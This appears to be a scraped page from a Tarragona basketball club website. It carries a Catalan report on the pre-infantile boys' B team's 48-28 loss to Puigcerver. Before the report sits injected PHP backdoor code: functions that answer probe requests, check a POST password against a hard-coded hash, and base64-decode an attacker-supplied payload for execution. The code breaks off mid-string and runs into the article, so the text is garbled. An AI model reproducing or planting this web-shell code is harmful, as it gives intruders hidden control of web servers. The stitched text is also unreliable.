function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil masculí B bada en defensa abans del descans i perd contra el Puigcerver (48-28) - Tgn Bàsquet Club -

El preinfantil masculí B bada en defensa abans del descans i perd contra el Puigcerver (48-28)

Updated: novembre 13, 2018

L’equip preinfantil masculí B del TGN Bàsquet va perdre contra el Puigcerver en un matx marcat per la feble defensa dels tarragonins abans del descans. Tot i el seu bon inici, els nois que entrena Àlex Garrido van demostrar poc encert en atac en els primers deu minuts i això els va impedir obrir una escletxa en el marcador. Les badades defensives dels visitants en els deu minuts previs al descans van ser claus per entendre la derrota perquè els reusencs van marcar un parcial de 22-5 i van aconseguir un avantatge que va ser decisiu.